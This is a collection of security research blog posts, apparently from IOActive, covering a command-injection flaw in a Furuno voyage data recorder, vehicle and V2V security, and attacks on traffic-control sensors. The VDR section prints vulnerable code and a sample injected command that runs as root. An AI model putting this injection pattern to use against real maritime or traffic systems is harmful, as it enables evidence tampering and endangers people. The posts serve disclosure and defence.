Figure: ‘Moduleserv’ v2.54 packet processing
Figure: ‘Moduleserv’ v2.54 unsanitized system call
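
Stripped of the protocol framing, the pattern in the figures reduces to the classic unsanitized system() call. A Python paraphrase (the command and field names are illustrative; the real code is C running on the DCU):

import os

def handle_software_backup_start(dest: str) -> None:
    # `dest` arrives in a SOFTWARE_BACKUP_START data unit and is spliced
    # straight into a shell command; "backup" is an illustrative name.
    os.system("backup " + dest)                # runs as root on the DCU

# A data unit carrying this string executes the injected command with
# root privileges; no authentication is required:
handle_software_backup_start("x; touch /tmp/pwned")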

 

At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge.

 

However, compromising the DCU is not enough to cover an attacker’s tracks, as it only contains a backup HDD, which is not designed to survive extreme conditions. The key device in this anti-forensics scenario would be the DRU. The privileged position gained by compromising the DCU would allow attackers to modify/delete data in the DRU too, as this unit is directly connected through an IEEE1394 interface. The image below shows the structure of the DRU.
Figure: Internal structure of the DRU

Before IMO’s resolution MSC.233(90) [3], VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.

 

IOActive, following our responsible disclosure policy, notified the CERT/CC about this vulnerability in October 2014. The CERT/CC, working alongside the JPCERT/CC, were in contact with Furuno and were able to reproduce and verify the vulnerability. Furuno committed to providing a patch for their customers “sometime in the year of 2015.” IOActive does not have further details on whether a patch has been made available.
 
References

EDITORIAL | March 24, 2015

Lawsuit counterproductive for automotive industry

It came to my attention that there is a lawsuit attempting to seek damages against automakers revolving around their cars being hackable.

The lawsuit cites Dr. Charlie Miller’s and my work several times, along with several other researchers who have been involved in automotive security research.

I’d like to be the first to say that I think this lawsuit is unfortunate and subverts the spirit of our research. Charlie and I approached our work with the end goals of determining if technologically advanced cars could be controlled with CAN messages and informing the public of our findings. Obviously, we found this to be true and were surprised at how much could be manipulated with network messages. We learned so much about automobiles, their communications, and their associated physical actions.

Our intent was never to insinuate deliberate negligence on the part of the manufacturers. Instead, like most security researchers, we wanted to push the boundaries of what was thought to be possible and have fun doing it. While I do believe there is risk associated with vehicle connectivity, I think that a lawsuit can only be harmful as it has the potential to take funds away from what is really important: securing the modern vehicle. I think any money automobile manufacturers must spend on legal fees would be more wisely spent on researching and developing automotive intrusion detection/prevention systems.

The automotive industry is not sitting idly by, but constantly working to improve the security of their past, present, and future vehicles. Security isn’t something that changes overnight, especially in the case of automobiles, which take even longer since there are both physical and software elements to be tested. Offensive security researchers will always be ahead of the people trying to formulate defenses, but that does not mean the defenders are not doing anything.

While our goals were public awareness and industry change, we did not want change to stem from the possible exploitation of public fears. Our hope was that by showing what is possible, we could work with the people who make the products we use and love on an everyday basis to improve vehicle security.

– cv

EDITORIAL | January 27, 2015

Life in the Fast Lane

Hi Internet Friends,
Chris Valasek here. You may remember me from educational films such as “Two Minus Three Equals Negative Fun”. If you have not heard, IOActive officially launched our Vehicle Security Service offering.
I’ve received several questions about the service and plan to answer them and many more during a webinar I am hosting on February 5, 2015 at 11 AM EST.
Some of the main talking points include: 
  • Why dedicate an entire service offering to vehicles and transportation?
  • A brief history of vehicle security research and why it has been relatively scarce
  • Why we believe that protecting vehicles and their supporting systems is of the utmost importance
  • IOActive’s goals for our Vehicle Security Service offering

Additionally, I’ll make sure to save sufficient time for Q&A to field your questions. I’d love to get as many questions as possible, so don’t be shy.

I look forward to your participation in the webinar on February 5, 2015 at 11 AM EST.

– cv
RESEARCH | September 18, 2014

A Dirty Distillation of Proposed V2V Readiness

Good Afternoon Internet
Chris Valasek here. You may remember me from such automated information kiosks as “Welcome to Springfield Airport”, and “Where’s Nordstrom?” Ever since Dr. Charlie Miller and I began our car hacking adventures, we’ve been asked about the upcoming Vehicle-to-Vehicle (V2V) initiative and haven’t had much to say because we only knew about the technology in the abstract. 

 

I finally decided to read the proposed documentation from the National Highway Traffic Safety Administration (NHTSA) titled: “Vehicle-to-Vehicle Communications: Readiness of V2V Technology for Application” (/wp-content/uploads/2014/09/Readiness-of-V2V-Technology-for-Application-812014.pdf). This is my distillation of a very small portion of the 327-page document. 

While there are countless pages of information regarding cost, crash statistics, consumer acceptance, policy, legal liability, and fuel economy, as a breaker of things, I was most interested in any technical information I could extract. In this blog post, I list some interesting bits I stumbled upon when reading the document. I skipped over huge portions I felt weren’t applicable to my investigation. Mainly anything that didn’t have to do with a purely technical implementation. In addition, any diagrams or pictures in this blog post were taken directly from “Vehicle-to-Vehicle Communications: Readiness of V2V Technology for Application”. 
 
A Very Brief History
 
Although currently a hot topic in the automotive world, the planning, design, and testing of the V2V infrastructure started over 11 years ago. It has gone from special purpose lanes in San Diego to a wireless infrastructure designed to be transparent to the end user. For those not in the know, a pilot program was deployed in Ann Arbor, MI from August 2012 to February 2014. This isn’t a harebrained solution to a long-standing problem; it has been thought about and fine-tuned for quite some time.
 
Overview
 
The V2V system is designed (obviously) to reduce death, injuries, and economic loss from motor vehicle crashes. Many people, including me, didn’t realize this initial proposal is only designed to provide visual and audible warnings to the driver and DOES NOT include or plan for physical alterations of the automobile based on V2V communications. For example, the V2V system will not brake a car in the event of an impending accident, but only warn the driver to apply the brake (although V2V could be used by current in-car systems, such as Collision Avoidance, to augment their functionality). 
 
The main components: 
 
Forward Collision Warning (FCW) – Warns you if you’re about to smash into something in front of you.
 
Emergency Electronic Brake Lights – Warns you when the person in front of you is slowing down while you’re reading your Twitter feed. 
 
Do Not Pass Warning – Really for unintentional drift more than you trying to push the limit to pass that big rig on the left side of the dotted line.
 
Left Turn Assist (LTA) — Warns you if there is a car coming when making a left turn. 
 
Intersection Movement Assist (IMA) – Figuring out how not to smash into several different cars at a 4-way intersection is hard, let’s go shopping!
 
Blind Spot Warning + Lane Change Warning – Warns you if you’re about to smash into something while changing lanes. No more “Rubbin is racin” I guess. 
This picture gives you a better idea of some of the scenarios mentioned above. 
 
 
You’ll notice that none of the safety mechanisms mentioned earlier involve performing any physical actions on the automobile. The designers of the V2V system realize that false positives could be a huge problem with warnings. Just imagine how scared people would be if their automobile braked or steered without cause in an attempt to protect them. 
 
Notable Items: 
  • The document predicts it will take 37 years for V2V to penetrate an entire fleet.
  • Rear and Forward Collision Warnings appear to be capable of saving the most money.
  • NHTSA does not expect an immediate difference, due to lack of adoption, but hopes to gain ground as time goes on.
 
My Thoughts
 
All these features seem like they will greatly increase vehicle and passenger safety. My one concern is a whole V2V infrastructure is being developed without much thought given to the physical control of a vehicle. It seems like the next logical step is to not only warn drivers if they are about to collide, but to prevent it. Maybe this will always be left up to the manufacturer, maybe not. 
 
Components/Terms
 
On Board Equipment (OBE) – The device in your car that will communicate with the V2V infrastructure. It will either be OEM (put there by the manufacturer) or aftermarket (sold separately from the car, mobile phone, standalone device, and so on). 
 
Road Side Equipment (RSE) – These devices will connect to the vehicles around them. They can be on road curves that warn the car about its speed, traffic lights, stop signs, and so on. 
 
Dedicated Short-range Communications (DSRC) – The short-range wireless communications that RSE and OBE use to communicate.
 
Driver Vehicle Interface (DVI) – This interface will display the V2V warnings.
Basic Safety Message (BSM) – This is a message sent to and received from other OBE and RSE devices to make the V2V system work. For example, it could announce the current speed of the vehicle.
 
Security Credentials Management System (SCMS) – The systems that manage all of the credentials for V2V systems, such as the certificates used to authenticate BSMs. 
 
 
Communications
 
The most interesting portion of the document for me was the technical information about the underlying communications system. I think many people want to understand what kind of wireless communications will be implemented for the vehicles and devices with which they will interact. 
 
The V2V infrastructure will operate in the 5.8 – 5.9 GHz band (5850 – 5925 MHz) using seven (7) non-overlapping 10 MHz channels, with a 5 MHz guard band at the beginning of the frequency range. Channel 172 will be used to send public safety information. 
 
Since these devices, much like your AM/FM radio, can only be on one channel at a time, switching is necessary. Switching between the Control Channel (CCH) and Service Channel (SCH) occurs every 50 ms to transmit or receive DSRC messages emitted by other vehicles or RSE. There is a 4 ms front guard leaving only 46 percent of “potentially” available bandwidth for BSM transmissions. 
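
The arithmetic behind that 46 percent figure, given the stated 50 ms alternation and 4 ms front guard:

# Channel time budget per the document: the radio alternates between the
# control and service channels every 50 ms, losing a 4 ms front guard
# on each interval.
interval_ms = 50                               # time on each channel
guard_ms = 4                                   # front guard per interval
share_for_bsm = (interval_ms - guard_ms) / (2 * interval_ms)
print(f"{share_for_bsm:.0%}")                  # -> 46%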
 
DSRC messages will be broadcast (omnidirectional for up to 300 meters) on a standardized network (IEEE 1609.4) over a standardized wireless layer IEEE 802.11p. The chart below shows all of the system standards currently anticipated for the first generation V2V system.
 
BSM messages also have a certain format, which is partially listed below. Please see the original document for more detailed information. Each message should have a packet size of 200 – 500 bytes with a maximum required range of 50 – 300 meters. 
 

Note: This is a partial snippet of the BSM Part II contents.
 
One main take away was that BSM messages are NOT encrypted; therefore, they could be viewed over the air by interested parties. The messages are, however, authenticated via a signing mechanism (discussed in the next section). 
 
Notable Items:
 
NHTSA is unsure whether current Wi-Fi infrastructure will interfere with communications among these devices. The claim is that more research is required. 
 
NHTSA claims the system will NOT collect or store any data identifying individuals or individual vehicles, nor will it create the ability for the government to do so.
 
NHTSA claims it would be extremely difficult for third parties to use the system to track a vehicle.
 
“NHTSA is aware of concerns that the V2V system could broadcast or store BSM data (such as GPS or path history) that, if captured by a third party, might facilitate very-localized vehicle tracking. In fact, the broadcast of unencrypted GPS, path history, and other data characteristics in or derived from the BSM appears to introduce only very limited potential risks to individual privacy.”
“It is theoretically possible that a third party could try to capture the transitory locational data in order to track a specific vehicle. However, we do not see a scenario in which one wishing to track a vehicle would choose the V2V system as the means.”
 
“To date, NHTSA’s V2V research has not included research specific to this issue, as researchers assumed that the possibility of cyber-attacks on motor vehicles was an existing vector of risk – not a new one created by V2V technologies.”
 
My Thoughts:
 
This is an amazingly complex system that is going to send, receive, and analyze data in real-time.
 
It will be interesting to see if people figure out how to use BSM messages to track vehicles or enumerate personal information due to their lack of encryption.
It looks like you could use BSM messages to gather information and track a vehicle, but I’m unsure of the practicality of doing so.
 
I don’t really know enough about radio/wireless to comment much more, but I’d love to hear other people’s thoughts. 
 
Security
 
The V2V system, while sending a majority of the information in cleartext, does have mechanisms that are designed for security. After much internal debate, it was decided that a Public Key Infrastructure (PKI) would be implemented to prove authenticity when sending and receiving messages. I think we’re all familiar with the PKI system, since we use it every day on the Internet to do our banking, chatting, and general internetting. Because this is a blog post, I only sampled a small set of the information available in the document. Also, I’m far from a crypto expert and will do my best to briefly explain the system that is being implemented. Please excuse or correct any errors you see with a quick tweet to @nudehaberdasher.
 
As stated before, BSMs are NOT encrypted, but verified with a digital signature, meaning that each message must be signed before it is sent and checked upon receipt. This trust system is a requirement, since thousands of messages will be authenticated in real-time when driving a vehicle that uses the V2V system. 
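
For a feel of the per-message work, here is a minimal sign-then-verify sketch. The document points at IEEE 1609.2-style certificates; ECDSA over P-256 is used here as an illustrative stand-in, and the BSM fields are made up:

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

bsm = b"speed=31.0;heading=92.5;lat=42.28;lon=-83.74"   # made-up fields

sender_key = ec.generate_private_key(ec.SECP256R1())    # per-certificate key
signature = sender_key.sign(bsm, ec.ECDSA(hashes.SHA256()))

# Receiver: the message travels in cleartext; only its signature is checked.
try:
    sender_key.public_key().verify(signature, bsm, ec.ECDSA(hashes.SHA256()))
    print("BSM accepted")
except InvalidSignature:
    print("BSM rejected")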
 
Like our Internet PKI system, there is a Certificate Authority (CA) but, to quote the paper: 
“We note that the interactions between the components shown in Figure <not-shown> are all based on machine-to-machine performance. No human judgment is involved in creation, granting, or revocation of the digital certificates.”
 
This means that there will not be human involvement when putting new devices on the V2V system. 
 
A simplified version of the system can be seen below.
 
 
Obviously, the system is much more complex, involving preinstalled certificates, which are supposed to last five minutes each, a signing authority, and even a misbehavior authority responsible for revoking certificates for a variety of reasons. A comparison between the V2V PKI system and the PKI system we currently use on the Internet is illustrated below. 
 
“Initial deployment is assumed to last for three years, and requires that OBEs on newly manufactured vehicles download a three-year batch of certificates. These batches would include reusable, overlapping five-minute certificates valid for one week. The term “overlapping” in this context refers to the fact that any certificate can be used at any time during the validity period. The batches would be good for one week and at this point are assumed to be around 20 certificates per week, which equates to 1,040 for one year of certificates. As the frequency of the certificate download batch changes for full deployment, the number and therefore size of the certificate batches also changes accordingly.”
 
It looks as if there are two options for preinstalled certificates, which will be placed there by OEMs and aftermarket solution providers:
 
Option 1: Three-year reusable, non-overlapping five-minute certificates
 
Option 2: Three-year batches of 260 reusable, overlapping five-minute certificates valid for one week
 
Certificates will be managed by the SCMS and communications with devices will go as follows: 
  • UPLOAD – a request for new certificates
  • DOWNLOAD – new certificates
  • UPLOAD – a misbehavior report
  • DOWNLOAD – a full/partial CRL
  • Conduct other data functions or system updates
Certificate renewal, updates, and revocation still seem to be up in the air. Certificate downloads could happen through cellular, WiFi, or DSRC. The most likely scenario will be DSRC due to cost and availability issues. New certificates could be updated in-full on a daily basis, or the system could use incremental updates to save time and bandwidth. 
 
While the design of the system seems to be pretty well developed, the details of the implementation and ownership still seem to be undecided. It looks like only time will tell who will own and administer this system and in what fashion it will be administered. 
 
Notable Items:
 
“As no decisions about ownership or operation have been made, we do not advocate for public or private ownership, but include the basic functions we expect the SCMS Manager would perform in our discussions and analyses.”
 
“Most SCMS functions listed above are fairly well developed. One critical function, which has not yet been fleshed out adequately for DOT to assess, is the Misbehavior Authority (MA) — the central function responsible for processing misbehavior reports generated by OBE and producing and publishing the CRL.”
 
“Global detection processes have not yet been defined.”
 
Research into the PKI system will continue into 2016. 
 
“Publication of the seed is sufficient to revoke all certificates belonging to the revoked device, but without the seed an eavesdropper cannot tell which certificates belong to a particular device. (Note: the revocation process is designed such that it does not give up backward privacy.)”
 
Internal Blacklist – This would be used by the SCMS to make sure that an OBE asking for new certificates is not on the revoked list. If a vehicle or device is on the list, no certificate updates will be issued.
 
My Thoughts:
 
Given that devices with valid certificates and valid certificate updates will be in the hands of an ‘attacker’, I’m interested to see how well the certificate revocation functionality works. 
 
Without any decision on certificate revocation, will it be implemented? If so, will it be done correctly and robustly? 
 
How fast can certificates be revoked? 
 
Sending spoofed, legitimately signed messages for even five minutes at a busy intersection could cause a massive disruption. 
 
Private keys are going to be in infrastructure devices, meaning there’s a good chance they won’t be ‘private’ for long. 
 
Crypto people do your crypto thing on this. 
 
Conclusion
 
I think the V2V technology is very interesting but still has many questions to answer, due to its massive technical complexity and huge economic cost. Additionally, I don’t think people have much to be worried about in the first iteration since there are only audible and visual warnings to the driver, without any direct effect on the vehicle. 
 
I hope that, when developing these systems, planning and design would be considered around vehicle control and not only warnings, as it seems like true V2V accident avoidance is the next logical step. Additionally, there is probably a good chance that current vehicle bus infrastructure is used to provide warnings to the driver, which means there is yet another remote entry point to the vehicle which potentially uses the vehicle’s network for communication. From an attacker’s perspective, all remote communication systems that interact with the car will be seen as attack surfaces. 
 
My last thought is that a true V2V infrastructure is further away than many people think. While we may have fringe devices in the coming years, full fleet adoption isn’t expected until 2037, so we can all go back to worrying about our robot overlords taking over in 2029. 
Chris Valasek @nudehaberdasher
 
Special Thanks: Charlie Miller (@0xcharlie) and Zach Lanier (@quine)
RESEARCH | August 14, 2014

Remote survey paper (car hacking)

Good Afternoon Interwebs,
Chris Valasek here. You may remember me from such nature films as “Earwigs: Eww”.
Charlie and I are finally getting around to publicly releasing our remote survey paper. I thought this went without saying but, to reiterate, we did NOT physically look at the cars that we discussed. The survey was designed as a high-level overview of the information we acquired from the mechanics’ sites for each manufacturer. The ‘Hackability’ rating is based upon our previous experience with automobiles, attack surface, and network structure.
Enjoy!
RESEARCH | July 31, 2014

Hacking Washington DC traffic control systems

This is a short blog post, because I’ve talked about this topic in the past. I want to let people know that I have the honor of presenting at DEF CON on Friday, August 8, 2014, at 1:00 PM. My presentation is entitled “Hacking US (and UK, Australia, France, Etc.) Traffic Control Systems”. I hope to see you all there; I’m sure you will like it.

I am frustrated with the lack of cooperation from Sensys Networks (the vendor of the vulnerable devices), but I realize that I should be thankful. It has prompted me to further my research and try different things, like performing passive onsite tests on real deployments in cities like Seattle, New York, and Washington DC. I’m not so sure these cities are equally thankful, since they have to deal with thousands of installed vulnerable devices, which are currently being used for critical traffic control.

The latest Sensys Networks numbers indicate that approximately 200,000 sensor devices are deployed worldwide (see http://www.trafficsystemsinc.com/newsletter/spring2014.html). Based on a unit cost of approximately $500, that puts roughly $100,000,000 (200,000 × $500) of vulnerable equipment buried in roads around the world, where anyone can hack it. I’m also concerned about how much it will cost taxpayers to fix and replace the equipment.

One way I confirmed that Sensys Networks devices were vulnerable was by traveling to Washington DC to observe, firsthand, a large deployment I had gotten to know.

When I exited the train station, the fun began.

INSIGHTS | April 30, 2014

Hacking US (and UK, Australia, France, etc.) Traffic Control Systems

Many of you have probably watched scenes from “Live Free or Die Hard” (Die Hard 4) where “terrorist hackers” manipulate traffic signals by just hitting Enter or typing a few keys. I wanted to do that! I started to look around, and while I couldn’t do exactly the same thing (too Hollywood style!), I got pretty close. I found some interesting devices used by traffic control systems in important US cities, and I could hack them 🙂 These devices are also used in cities in the UK, France, Australia, China, etc., making them even more interesting.
After getting the devices, it wasn’t difficult to find vulnerabilities (actually, it was more difficult to make them work properly, but that’s another story).

The vulnerabilities I found allow anyone to take complete control of the devices and send fake data to traffic control systems. Basically anyone could cause a traffic mess by launching an attack with a simple exploit programmed on cheap hardware ($100 or less).
I even tested the attack launched from a drone flying at over 650 feet, and it worked! Theoretically, an attack could be launched from up to 1 or 2 miles away with a better drone and hardware; I just used a common, commercially available drone and cheap hardware. Since it seems flying a drone in the US is not illegal, and anyone will soon be able to get drones on demand, I would be worried about attacks from the sky in the US.
It might also be possible to create self-replicating malware (a worm) that infects these vulnerable devices and later launches attacks affecting traffic control systems. An exploited device could then be used to compromise all of the same devices nearby.
 
What worries me the most is that if a vulnerable device is compromised, it’s really, really difficult and really, really costly to detect it. So there could already be compromised devices out there that no one knows about or could know about. 
 
Let me give you an idea of how affected some cities are. The following is from the vulnerable vendor’s documentation:
  • 250+ customers in 45 US states and 10 countries
  • Important US cities have deployments: New York, Washington DC, San Francisco, Los Angeles, Boston, Seattle, etc.
  • 50,000+ devices deployed worldwide (most of them in the US)
  • Countries include US, United Kingdom, China, Canada, Australia, France, etc. For instance, some UK cities with deployments: London, Shropshire, Slough, Bournemouth, Aberdeen, Blackburn with Darwen Borough Council, Belfast, etc. 
  • Australia has a big deployment on one of the most important and modern freeways.


As you can see, there are 50,000+ devices out there that could be hacked and cause traffic messes in many important cities.

Going onsite
I knew that the devices I have are vulnerable, but I wanted to be 100% sure that I wasn’t missing anything with my tests. Real-life deployments could have different configurations (different hardware/software versions), and it seemed that the vendor provided wrong information when I reported the vulnerabilities, so maybe what I found didn’t affect real-life deployments. I put my “tools” in my backpack and went to Seattle, New York, and Washington DC to do some “passive” onsite tests (“no hacking and nothing illegal” :)). Luckily, I could confirm that what I found applied to real-life deployments. BTW, many thanks to Ian Amit for the pictures and videos and for daring to go with me to DC :).

Vulnerabilities
As you may have already realized, I’m not going to share specific technical details here (for that, you will have to wait a couple of weeks and go to Infiltrate 2014). What I would like to mention is that the vendor was contacted a long time ago (September 2013) through ICS-CERT (the initial report to ICS-CERT was sent on July 31st, 2013). I was told by ICS-CERT that the vendor said they didn’t think the issues were critical or even important. For instance, regarding one of the vulnerabilities, the vendor said that since the devices were designed that way (insecure) on purpose, they were working as designed, and that customers (state/city governments) wanted the devices to work that way (insecure), so there wasn’t any security issue. Yes, that was the answer; I couldn’t believe it. 
 
Regarding another vulnerability, the vendor said that it’s already fixed in newer versions of the device. But there is a big problem: you need to get a new device and replace the old one. This is not good news for state/city governments, since thousands of devices are already out there, and the time and money it would take to replace all of them is considerable. Meanwhile, the existing devices remain vulnerable and open to attack.
 
Another excuse the vendor provided is that because the devices don’t control traffic lights, there is no need for security. This is crazy, because while the devices don’t directly control traffic control systems, they have a direct influence on the actions and decisions of these systems.
I tried several times to make ICS-CERT and the vendor understand that these issues were serious, but I couldn’t convince them. In the end I said: if the vendor doesn’t think they are vulnerable, then OK, I’m done with this; I have tried hard, and I don’t want to continue wasting time and effort. Also, since DHS is aware of this (through ICS-CERT), and it seems that this is neither critical nor important to them, there isn’t anything else I can do except go public.
 
This should be another wake-up call for governments to evaluate the security of devices/products before using them in critical infrastructure, and also a request for providers of government devices/products to take security and vulnerability reports seriously.
 
Impact
 
By exploiting the vulnerabilities I found, an attacker could cause traffic jams and problems at intersections, freeways, highways, etc. 
It’s possible to make traffic lights (depending on the configuration) stay green for more or less time, stay red and not change to green (I bet many of you have experienced something like this when driving during non-traffic hours late at night, or while on a bike or in a small car), or flash. It’s also possible to cause electronic signs to display incorrect speed limits and instructions, and to make ramp meters allow cars onto the freeway faster or slower than needed. 
 
These traffic problems could create real issues, even deadly ones, by causing accidents or by blocking ambulances, firefighters, or police cars responding to an emergency call.
I’m sure there are manual overrides and secondary controls in place that can be used if anomalies are detected, which could mitigate possible attacks, and some traffic control systems won’t depend only on these vulnerable devices. But this doesn’t mean that attacks are impossible or really complex; the possibility of a real attack shouldn’t be disregarded, since launching an attack is simple. The only thing that could be complex is making an attack have a bigger impact, but complex doesn’t mean impossible.
 

Traffic departments in states/cities with vulnerable devices deployed should pay special attention to traffic anomalies when there is no apparent reason and closely watch the device’s behavior.
 
“In 2012, there were an estimated 5,615,000 police-reported traffic crashes in which 33,561 people were killed and 2,362,000 people were injured; 3,950,000 crashes resulted in property damage only.” US DoT National Highway Traffic Safety Administration: Traffic Safety Facts
 
“Road crashes cost the U.S. $230.6 billion per year, or an average of $820 per person” Association for Safe International Road Travel: Annual US Road Crash Statistics
 
If you add malfunctioning traffic control systems to the above stats, the numbers could be a lot worse.